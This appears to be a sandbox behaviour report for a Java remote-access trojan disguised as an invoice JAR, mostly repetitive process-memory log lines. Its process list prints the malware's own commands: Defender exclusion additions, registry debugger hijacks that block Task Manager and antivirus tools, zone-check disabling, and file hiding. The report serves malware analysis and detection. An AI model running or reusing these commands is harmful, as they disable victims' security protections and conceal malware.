cmd.exe 198 PID 1344 wrote to memory of 1692 1344 cmd.exe 198 PID 1344 wrote to memory of 1692 1344 cmd.exe 198 PID 1344 wrote to memory of 1836 1344 cmd.exe 199 PID 1344 wrote to memory of 1836 1344 cmd.exe 199 PID 1344 wrote to memory of 1836 1344 cmd.exe 199 PID 1088 wrote to memory of 1820 1088 java.exe 200 PID 1088 wrote to memory of 1820 1088 java.exe 200 PID 1088 wrote to memory of 1820 1088 java.exe 200 PID 1088 wrote to memory of 1580 1088 java.exe 201 PID 1088 wrote to memory of 1580 1088 java.exe 201 PID 1088 wrote to memory of 1580 1088 java.exe 201 PID 1820 wrote to memory of 2004 1820 cmd.exe 202 PID 1820 wrote to memory of 2004 1820 cmd.exe 202 PID 1820 wrote to memory of 2004 1820 cmd.exe 202 PID 1820 wrote to memory of 844 1820 cmd.exe 204 PID 1820 wrote to memory of 844 1820 cmd.exe 204 PID 1820 wrote to memory of 844 1820 cmd.exe 204 PID 1088 wrote to memory of 1908 1088 java.exe 205 PID 1088 wrote to memory of 1908 1088 java.exe 205 PID 1088 wrote to memory of 1908 1088 java.exe 205 PID 1908 wrote to memory of 2032 1908 cmd.exe 206 PID 1908 wrote to memory of 2032 1908 cmd.exe 206 PID 1908 wrote to memory of 2032 1908 cmd.exe 206 PID 1908 wrote to memory of 2012 1908 cmd.exe 207 PID 1908 wrote to memory of 2012 1908 cmd.exe 207 PID 1908 wrote to memory of 2012 1908 cmd.exe 207 PID 1088 wrote to memory of 1796 1088 java.exe 208 PID 1088 wrote to memory of 1796 1088 java.exe 208 PID 1088 wrote to memory of 1796 1088 java.exe 208 PID 1796 wrote to memory of 1840 1796 cmd.exe 209 PID 1796 wrote to memory of 1840 1796 cmd.exe 209 PID 1796 wrote to memory of 1840 1796 cmd.exe 209 PID 1796 wrote to memory of 464 1796 cmd.exe 210 PID 1796 wrote to memory of 464 1796 cmd.exe 210 PID 1796 wrote to memory of 464 1796 cmd.exe 210 PID 1088 wrote to memory of 520 1088 java.exe 211 PID 1088 wrote to memory of 520 1088 java.exe 211 PID 1088 wrote to memory of 520 1088 java.exe 211 PID 520 wrote to memory of 1340 520 cmd.exe 212 PID 520 wrote to memory of 1340 520 cmd.exe 212 PID 520 wrote to memory of 1340 520 cmd.exe 212 PID 520 wrote to memory of 1692 520 cmd.exe 213 PID 520 wrote to memory of 1692 520 cmd.exe 213 PID 520 wrote to memory of 1692 520 cmd.exe 213 PID 1088 wrote to memory of 320 1088 java.exe 214 PID 1088 wrote to memory of 320 1088 java.exe 214 PID 1088 wrote to memory of 320 1088 java.exe 214 PID 320 wrote to memory of 2004 320 cmd.exe 215 PID 320 wrote to memory of 2004 320 cmd.exe 215 PID 320 wrote to memory of 2004 320 cmd.exe 215 PID 320 wrote to memory of 1972 320 cmd.exe 216 PID 320 wrote to memory of 1972 320 cmd.exe 216 PID 320 wrote to memory of 1972 320 cmd.exe 216 PID 1088 wrote to memory of 1396 1088 java.exe 217 PID 1088 wrote to memory of 1396 1088 java.exe 217 PID 1088 wrote to memory of 1396 1088 java.exe 217 PID 1396 wrote to memory of 2032 1396 cmd.exe 218 PID 1396 wrote to memory of 2032 1396 cmd.exe 218 PID 1396 wrote to memory of 2032 1396 cmd.exe 218 PID 1396 wrote to memory of 1508 1396 cmd.exe 219 PID 1396 wrote to memory of 1508 1396 cmd.exe 219 PID 1396 wrote to memory of 1508 1396 cmd.exe 219 PID 1088 wrote to memory of 744 1088 java.exe 220 PID 1088 wrote to memory of 744 1088 java.exe 220 PID 1088 wrote to memory of 744 1088 java.exe 220 PID 744 wrote to memory of 1772 744 cmd.exe 221 PID 744 wrote to memory of 1772 744 cmd.exe 221 PID 744 wrote to memory of 1772 744 cmd.exe 221 PID 744 wrote to memory of 1332 744 cmd.exe 222 PID 744 wrote to memory of 1332 744 cmd.exe 222 PID 744 wrote to memory of 1332 744 cmd.exe 222 PID 1088 wrote to memory of 1580 1088 java.exe 223 PID 1088 wrote to memory of 1580 1088 java.exe 223 PID 1088 wrote to memory of 1580 1088 java.exe 223 PID 1088 wrote to memory of 1948 1088 java.exe 225 PID 1088 wrote to memory of 1948 1088 java.exe 225 PID 1088 wrote to memory of 1948 1088 java.exe 225 PID 1948 wrote to memory of 1620 1948 cmd.exe 226 PID 1948 wrote to memory of 1620 1948 cmd.exe 226 PID 1948 wrote to memory of 1620 1948 cmd.exe 226 PID 1948 wrote to memory of 1592 1948 cmd.exe 227 PID 1948 wrote to memory of 1592 1948 cmd.exe 227 PID 1948 wrote to memory of 1592 1948 cmd.exe 227 PID 1088 wrote to memory of 1836 1088 java.exe 228 PID 1088 wrote to memory of 1836 1088 java.exe 228 PID 1088 wrote to memory of 1836 1088 java.exe 228 PID 1836 wrote to memory of 1976 1836 cmd.exe 229 PID 1836 wrote to memory of 1976 1836 cmd.exe 229 PID 1836 wrote to memory of 1976 1836 cmd.exe 229 PID 1836 wrote to memory of 1472 1836 cmd.exe 230 PID 1836 wrote to memory of 1472 1836 cmd.exe 230 PID 1836 wrote to memory of 1472 1836 cmd.exe 230 PID 1088 wrote to memory of 1204 1088 java.exe 231 PID 1088 wrote to memory of 1204 1088 java.exe 231 PID 1088 wrote to memory of 1204 1088 java.exe 231 PID 1204 wrote to memory of 2012 1204 cmd.exe 232 PID 1204 wrote to memory of 2012 1204 cmd.exe 232 PID 1204 wrote to memory of 2012 1204 cmd.exe 232 PID 1204 wrote to memory of 1012 1204 cmd.exe 233 PID 1204 wrote to memory of 1012 1204 cmd.exe 233 PID 1204 wrote to memory of 1012 1204 cmd.exe 233 PID 1088 wrote to memory of 1736 1088 java.exe 234 PID 1088 wrote to memory of 1736 1088 java.exe 234 PID 1088 wrote to memory of 1736 1088 java.exe 234 PID 1736 wrote to memory of 1664 1736 cmd.exe 235 PID 1736 wrote to memory of 1664 1736 cmd.exe 235 PID 1736 wrote to memory of 1664 1736 cmd.exe 235 PID 1736 wrote to memory of 784 1736 cmd.exe 236 PID 1736 wrote to memory of 784 1736 cmd.exe 236 PID 1736 wrote to memory of 784 1736 cmd.exe 236 PID 1088 wrote to memory of 1072 1088 java.exe 237 PID 1088 wrote to memory of 1072 1088 java.exe 237 PID 1088 wrote to memory of 1072 1088 java.exe 237 PID 1072 wrote to memory of 1956 1072 cmd.exe 238 PID 1072 wrote to memory of 1956 1072 cmd.exe 238 PID 1072 wrote to memory of 1956 1072 cmd.exe 238 PID 1072 wrote to memory of 1540 1072 cmd.exe 239 PID 1072 wrote to memory of 1540 1072 cmd.exe 239 PID 1072 wrote to memory of 1540 1072 cmd.exe 239 PID 1088 wrote to memory of 2016 1088 java.exe 240 PID 1088 wrote to memory of 2016 1088 java.exe 240 PID 1088 wrote to memory of 2016 1088 java.exe 240 PID 2016 wrote to memory of 1940 2016 cmd.exe 241 PID 2016 wrote to memory of 1940 2016 cmd.exe 241 PID 2016 wrote to memory of 1940 2016 cmd.exe 241 PID 2016 wrote to memory of 1840 2016 cmd.exe 242 PID 2016 wrote to memory of 1840 2016 cmd.exe 242 PID 2016 wrote to memory of 1840 2016 cmd.exe 242 PID 1088 wrote to memory of 1608 1088 java.exe 243 PID 1088 wrote to memory of 1608 1088 java.exe 243 PID 1088 wrote to memory of 1608 1088 java.exe 243 PID 1608 wrote to memory of 1604 1608 cmd.exe 244 PID 1608 wrote to memory of 1604 1608 cmd.exe 244 PID 1608 wrote to memory of 1604 1608 cmd.exe 244 PID 1088 wrote to memory of 1060 1088 java.exe 245 PID 1088 wrote to memory of 1060 1088 java.exe 245 PID 1088 wrote to memory of 1060 1088 java.exe 245 PID 1608 wrote to memory of 1960 1608 cmd.exe 246 PID 1608 wrote to memory of 1960 1608 cmd.exe 246 PID 1608 wrote to memory of 1960 1608 cmd.exe 246 PID 1088 wrote to memory of 1936 1088 java.exe 248 PID 1088 wrote to memory of 1936 1088 java.exe 248 PID 1088 wrote to memory of 1936 1088 java.exe 248 PID 1936 wrote to memory of 1472 1936 cmd.exe 249 PID 1936 wrote to memory of 1472 1936 cmd.exe 249 PID 1936 wrote to memory of 1472 1936 cmd.exe 249 PID 1936 wrote to memory of 2012 1936 cmd.exe 250 PID 1936 wrote to memory of 2012 1936 cmd.exe 250 PID 1936 wrote to memory of 2012 1936 cmd.exe 250 PID 1088 wrote to memory of 1808 1088 java.exe 251 PID 1088 wrote to memory of 1808 1088 java.exe 251 PID 1088 wrote to memory of 1808 1088 java.exe 251 PID 1808 wrote to memory of 1664 1808 cmd.exe 252 PID 1808 wrote to memory of 1664 1808 cmd.exe 252 PID 1808 wrote to memory of 1664 1808 cmd.exe 252 PID 1808 wrote to memory of 2032 1808 cmd.exe 253 PID 1808 wrote to memory of 2032 1808 cmd.exe 253 PID 1808 wrote to memory of 2032 1808 cmd.exe 253 PID 1088 wrote to memory of 1852 1088 java.exe 254 PID 1088 wrote to memory of 1852 1088 java.exe 254 PID 1088 wrote to memory of 1852 1088 java.exe 254 PID 1852 wrote to memory of 1540 1852 cmd.exe 255 PID 1852 wrote to memory of 1540 1852 cmd.exe 255 PID 1852 wrote to memory of 1540 1852 cmd.exe 255 PID 1852 wrote to memory of 1332 1852 cmd.exe 256 PID 1852 wrote to memory of 1332 1852 cmd.exe 256 PID 1852 wrote to memory of 1332 1852 cmd.exe 256 PID 1088 wrote to memory of 464 1088 java.exe 257 PID 1088 wrote to memory of 464 1088 java.exe 257 PID 1088 wrote to memory of 464 1088 java.exe 257 PID 464 wrote to memory of 1924 464 cmd.exe 258 PID 464 wrote to memory of 1924 464 cmd.exe 258 PID 464 wrote to memory of 1924 464 cmd.exe 258 PID 464 wrote to memory of 1500 464 cmd.exe 259 PID 464 wrote to memory of 1500 464 cmd.exe 259 PID 464 wrote to memory of 1500 464 cmd.exe 259 PID 1088 wrote to memory of 1692 1088 java.exe 260 PID 1088 wrote to memory of 1692 1088 java.exe 260 PID 1088 wrote to memory of 1692 1088 java.exe 260 PID 1692 wrote to memory of 456 1692 cmd.exe 261 PID 1692 wrote to memory of 456 1692 cmd.exe 261 PID 1692 wrote to memory of 456 1692 cmd.exe 261 PID 1692 wrote to memory of 792 1692 cmd.exe 262 PID 1692 wrote to memory of 792 1692 cmd.exe 262 PID 1692 wrote to memory of 792 1692 cmd.exe 262 PID 1088 wrote to memory of 1868 1088 java.exe 263 PID 1088 wrote to memory of 1868 1088 java.exe 263 PID 1088 wrote to memory of 1868 1088 java.exe 263 PID 1868 wrote to memory of 1632 1868 cmd.exe 264 PID 1868 wrote to memory of 1632 1868 cmd.exe 264 PID 1868 wrote to memory of 1632 1868 cmd.exe 264 PID 1868 wrote to memory of 1060 1868 cmd.exe 265 PID 1868 wrote to memory of 1060 1868 cmd.exe 265 PID 1868 wrote to memory of 1060 1868 cmd.exe 265 PID 1088 wrote to memory of 2012 1088 java.exe 266 PID 1088 wrote to memory of 2012 1088 java.exe 266 PID 1088 wrote to memory of 2012 1088 java.exe 266 PID 2012 wrote to memory of 1516 2012 cmd.exe 267 PID 2012 wrote to memory of 1516 2012 cmd.exe 267 PID 2012 wrote to memory of 1516 2012 cmd.exe 267 PID 1088 wrote to memory of 1532 1088 java.exe 268 PID 1088 wrote to memory of 1532 1088 java.exe 268 PID 1088 wrote to memory of 1532 1088 java.exe 268 PID 2012 wrote to memory of 1940 2012 cmd.exe 270 PID 2012 wrote to memory of 1940 2012 cmd.exe 270 PID 2012 wrote to memory of 1940 2012 cmd.exe 270 PID 1088 wrote to memory of 1564 1088 java.exe 271 PID 1088 wrote to memory of 1564 1088 java.exe 271 PID 1088 wrote to memory of 1564 1088 java.exe 271 PID 1564 wrote to memory of 1604 1564 cmd.exe 272 PID 1564 wrote to memory of 1604 1564 cmd.exe 272 PID 1564 wrote to memory of 1604 1564 cmd.exe 272 PID 1564 wrote to memory of 456 1564 cmd.exe 273 PID 1564 wrote to memory of 456 1564 cmd.exe 273 PID 1564 wrote to memory of 456 1564 cmd.exe 273 PID 1088 wrote to memory of 1932 1088 java.exe 274 PID 1088 wrote to memory of 1932 1088 java.exe 274 PID 1088 wrote to memory of 1932 1088 java.exe 274 PID 1932 wrote to memory of 1632 1932 cmd.exe 275 PID 1932 wrote to memory of 1632 1932 cmd.exe 275 PID 1932 wrote to memory of 1632 1932 cmd.exe 275 PID 1932 wrote to memory of 784 1932 cmd.exe 276 PID 1932 wrote to memory of 784 1932 cmd.exe 276 PID 1932 wrote to memory of 784 1932 cmd.exe 276 PID 1088 wrote to memory of 480 1088 java.exe 277 PID 1088 wrote to memory of 480 1088 java.exe 277 PID 1088 wrote to memory of 480 1088 java.exe 277 PID 480 wrote to memory of 1516 480 cmd.exe 278 PID 480 wrote to memory of 1516 480 cmd.exe 278 PID 480 wrote to memory of 1516 480 cmd.exe 278 PID 480 wrote to memory of 1872 480 cmd.exe 279 PID 480 wrote to memory of 1872 480 cmd.exe 279 PID 480 wrote to memory of 1872 480 cmd.exe 279 PID 1088 wrote to memory of 792 1088 java.exe 280 PID 1088 wrote to memory of 792 1088 java.exe 280 PID 1088 wrote to memory of 792 1088 java.exe 280 PID 792 wrote to memory of 1176 792 cmd.exe 281 PID 792 wrote to memory of 1176 792 cmd.exe 281 PID 792 wrote to memory of 1176 792 cmd.exe 281 PID 792 wrote to memory of 1620 792 cmd.exe 282 PID 792 wrote to memory of 1620 792 cmd.exe 282 PID 792 wrote to memory of 1620 792 cmd.exe 282 PID 1088 wrote to memory of 2032 1088 java.exe 283 PID 1088 wrote to memory of 2032 1088 java.exe 283 PID 1088 wrote to memory of 2032 1088 java.exe 283 PID 2032 wrote to memory of 1012 2032 cmd.exe 284 PID 2032 wrote to memory of 1012 2032 cmd.exe 284 PID 2032 wrote to memory of 1012 2032 cmd.exe 284 PID 2032 wrote to memory of 1060 2032 cmd.exe 285 PID 2032 wrote to memory of 1060 2032 cmd.exe 285 PID 2032 wrote to memory of 1060 2032 cmd.exe 285 PID 1088 wrote to memory of 1632 1088 java.exe 286 PID 1088 wrote to memory of 1632 1088 java.exe 286 PID 1088 wrote to memory of 1632 1088 java.exe 286 PID 1632 wrote to memory of 1056 1632 cmd.exe 287 PID 1632 wrote to memory of 1056 1632 cmd.exe 287 PID 1632 wrote to memory of 1056 1632 cmd.exe 287 PID 1632 wrote to memory of 2004 1632 cmd.exe 288 PID 1632 wrote to memory of 2004 1632 cmd.exe 288 PID 1632 wrote to memory of 2004 1632 cmd.exe 288 PID 1088 wrote to memory of 1872 1088 java.exe 289 PID 1088 wrote to memory of 1872 1088 java.exe 289 PID 1088 wrote to memory of 1872 1088 java.exe 289 PID 1872 wrote to memory of 1332 1872 cmd.exe 290 PID 1872 wrote to memory of 1332 1872 cmd.exe 290 PID 1872 wrote to memory of 1332 1872 cmd.exe 290 PID 1872 wrote to memory of 1928 1872 cmd.exe 291 PID 1872 wrote to memory of 1928 1872 cmd.exe 291 PID 1872 wrote to memory of 1928 1872 cmd.exe 291 PID 1088 wrote to memory of 1052 1088 java.exe 292 PID 1088 wrote to memory of 1052 1088 java.exe 292 PID 1088 wrote to memory of 1052 1088 java.exe 292 PID 1052 wrote to memory of 1012 1052 cmd.exe 293 PID 1052 wrote to memory of 1012 1052 cmd.exe 293 PID 1052 wrote to memory of 1012 1052 cmd.exe 293 PID 1052 wrote to memory of 784 1052 cmd.exe 294 PID 1052 wrote to memory of 784 1052 cmd.exe 294 PID 1052 wrote to memory of 784 1052 cmd.exe 294 PID 1088 wrote to memory of 1924 1088 java.exe 295 PID 1088 wrote to memory of 1924 1088 java.exe 295 PID 1088 wrote to memory of 1924 1088 java.exe 295 PID 1924 wrote to memory of 2004 1924 cmd.exe 296 PID 1924 wrote to memory of 2004 1924 cmd.exe 296 PID 1924 wrote to memory of 2004 1924 cmd.exe 296 PID 1088 wrote to memory of 1500 1088 java.exe 297 PID 1088 wrote to memory of 1500 1088 java.exe 297 PID 1088 wrote to memory of 1500 1088 java.exe 297 PID 1924 wrote to memory of 1508 1924 cmd.exe 299 PID 1924 wrote to memory of 1508 1924 cmd.exe 299 PID 1924 wrote to memory of 1508 1924 cmd.exe 299 PID 1088 wrote to memory of 1540 1088 java.exe 300 PID 1088 wrote to memory of 1540 1088 java.exe 300 PID 1088 wrote to memory of 1540 1088 java.exe 300 PID 1540 wrote to memory of 1472 1540 cmd.exe 301 PID 1540 wrote to memory of 1472 1540 cmd.exe 301 PID 1540 wrote to memory of 1472 1540 cmd.exe 301 PID 1540 wrote to memory of 1508 1540 cmd.exe 302 PID 1540 wrote to memory of 1508 1540 cmd.exe 302 PID 1540 wrote to memory of 1508 1540 cmd.exe 302 PID 1088 wrote to memory of 2004 1088 java.exe 303 PID 1088 wrote to memory of 2004 1088 java.exe 303 PID 1088 wrote to memory of 2004 1088 java.exe 303 PID 2004 wrote to memory of 1060 2004 cmd.exe 304 PID 2004 wrote to memory of 1060 2004 cmd.exe 304 PID 2004 wrote to memory of 1060 2004 cmd.exe 304 PID 2004 wrote to memory of 1512 2004 cmd.exe 305 PID 2004 wrote to memory of 1512 2004 cmd.exe 305 PID 2004 wrote to memory of 1512 2004 cmd.exe 305 PID 1088 wrote to memory of 1332 1088 java.exe 306 PID 1088 wrote to memory of 1332 1088 java.exe 306 PID 1088 wrote to memory of 1332 1088 java.exe 306 PID 1332 wrote to memory of 1500 1332 cmd.exe 307 PID 1332 wrote to memory of 1500 1332 cmd.exe 307 PID 1332 wrote to memory of 1500 1332 cmd.exe 307 PID 1332 wrote to memory of 1508 1332 cmd.exe 308 PID 1332 wrote to memory of 1508 1332 cmd.exe 308 PID 1332 wrote to memory of 1508 1332 cmd.exe 308 PID 1088 wrote to memory of 1060 1088 java.exe 309 PID 1088 wrote to memory of 1060 1088 java.exe 309 PID 1088 wrote to memory of 1060 1088 java.exe 309 PID 1060 wrote to memory of 1604 1060 cmd.exe 310 PID 1060 wrote to memory of 1604 1060 cmd.exe 310 PID 1060 wrote to memory of 1604 1060 cmd.exe 310 PID 1060 wrote to memory of 1940 1060 cmd.exe 311 PID 1060 wrote to memory of 1940 1060 cmd.exe 311 PID 1060 wrote to memory of 1940 1060 cmd.exe 311 PID 1088 wrote to memory of 1508 1088 java.exe 312 PID 1088 wrote to memory of 1508 1088 java.exe 312 PID 1088 wrote to memory of 1508 1088 java.exe 312 PID 1508 wrote to memory of 1620 1508 cmd.exe 313 PID 1508 wrote to memory of 1620 1508 cmd.exe 313 PID 1508 wrote to memory of 1620 1508 cmd.exe 313 PID 1508 wrote to memory of 1500 1508 cmd.exe 314 PID 1508 wrote to memory of 1500 1508 cmd.exe 314 PID 1508 wrote to memory of 1500 1508 cmd.exe 314 PID 1088 wrote to memory of 1604 1088 java.exe 315 PID 1088 wrote to memory of 1604 1088 java.exe 315 PID 1088 wrote to memory of 1604 1088 java.exe 315 PID 1604 wrote to memory of 1620 1604 cmd.exe 316 PID 1604 wrote to memory of 1620 1604 cmd.exe 316 PID 1604 wrote to memory of 1620 1604 cmd.exe 316 PID 1604 wrote to memory of 1012 1604 cmd.exe 317 PID 1604 wrote to memory of 1012 1604 cmd.exe 317 PID 1604 wrote to memory of 1012 1604 cmd.exe 317 PID 1088 wrote to memory of 1940 1088 java.exe 318 PID 1088 wrote to memory of 1940 1088 java.exe 318 PID 1088 wrote to memory of 1940 1088 java.exe 318 PID 1940 wrote to memory of 1012 1940 cmd.exe 319 PID 1940 wrote to memory of 1012 1940 cmd.exe 319 PID 1940 wrote to memory of 1012 1940 cmd.exe 319 PID 1940 wrote to memory of 2056 1940 cmd.exe 320 PID 1940 wrote to memory of 2056 1940 cmd.exe 320 PID 1940 wrote to memory of 2056 1940 cmd.exe 320 PID 1088 wrote to memory of 2068 1088 java.exe 321 PID 1088 wrote to memory of 2068 1088 java.exe 321 PID 1088 wrote to memory of 2068 1088 java.exe 321 PID 2068 wrote to memory of 2080 2068 cmd.exe 322 PID 2068 wrote to memory of 2080 2068 cmd.exe 322 PID 2068 wrote to memory of 2080 2068 cmd.exe 322 PID 2068 wrote to memory of 2092 2068 cmd.exe 323 PID 2068 wrote to memory of 2092 2068 cmd.exe 323 PID 2068 wrote to memory of 2092 2068 cmd.exe 323 PID 1088 wrote to memory of 2104 1088 java.exe 324 PID 1088 wrote to memory of 2104 1088 java.exe 324 PID 1088 wrote to memory of 2104 1088 java.exe 324 PID 2104 wrote to memory of 2116 2104 cmd.exe 325 PID 2104 wrote to memory of 2116 2104 cmd.exe 325 PID 2104 wrote to memory of 2116 2104 cmd.exe 325 PID 2104 wrote to memory of 2128 2104 cmd.exe 326 PID 2104 wrote to memory of 2128 2104 cmd.exe 326 PID 2104 wrote to memory of 2128 2104 cmd.exe 326 PID 1088 wrote to memory of 2140 1088 java.exe 327 PID 1088 wrote to memory of 2140 1088 java.exe 327 PID 1088 wrote to memory of 2140 1088 java.exe 327 PID 2140 wrote to memory of 2152 2140 cmd.exe 328 PID 2140 wrote to memory of 2152 2140 cmd.exe 328 PID 2140 wrote to memory of 2152 2140 cmd.exe 328 PID 2140 wrote to memory of 2164 2140 cmd.exe 329 PID 2140 wrote to memory of 2164 2140 cmd.exe 329 PID 2140 wrote to memory of 2164 2140 cmd.exe 329 PID 1088 wrote to memory of 2176 1088 java.exe 330 PID 1088 wrote to memory of 2176 1088 java.exe 330 PID 1088 wrote to memory of 2176 1088 java.exe 330 PID 1088 wrote to memory of 2224 1088 java.exe 332 PID 1088 wrote to memory of 2224 1088 java.exe 332 PID 1088 wrote to memory of 2224 1088 java.exe 332 PID 1088 wrote to memory of 2280 1088 java.exe 334 PID 1088 wrote to memory of 2280 1088 java.exe 334 PID 1088 wrote to memory of 2280 1088 java.exe 334 PID 1088 wrote to memory of 2328 1088 java.exe 336 PID 1088 wrote to memory of 2328 1088 java.exe 336 PID 1088 wrote to memory of 2328 1088 java.exe 336 PID 1088 wrote to memory of 2376 1088 java.exe 338 PID 1088 wrote to memory of 2376 1088 java.exe 338 PID 1088 wrote to memory of 2376 1088 java.exe 338 PID 1088 wrote to memory of 2424 1088 java.exe 340 PID 1088 wrote to memory of 2424 1088 java.exe 340 PID 1088 wrote to memory of 2424 1088 java.exe 340 PID 1088 wrote to memory of 2472 1088 java.exe 342 PID 1088 wrote to memory of 2472 1088 java.exe 342 PID 1088 wrote to memory of 2472 1088 java.exe 342 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1780 attrib.exe 1788 attrib.exe 1832 attrib.exe 1828 attrib.exe 1180 attrib.exe 1840 attrib.exe 1776 attrib.exe 1752 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Invoice 645505.jar"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:304
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:744
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:284
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1780
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1788
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\plstY\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1832
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\plstY\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1828
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\plstY2⤵
- Views/modifies file attributes
PID:1180
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\plstY2⤵
- Views/modifies file attributes
PID:1840
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\plstY2⤵
- Views/modifies file attributes
PID:1776
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\plstY\oxPAo.class2⤵
- Views/modifies file attributes
PID:1752
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1868
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1476
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:1560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\plstY','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\plstY\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1540
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1604
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:1876
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1960
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:1940
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:2032
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1992
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:1548
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1012
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1504
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1632
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:744
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1332
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1796
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:1824
-
-
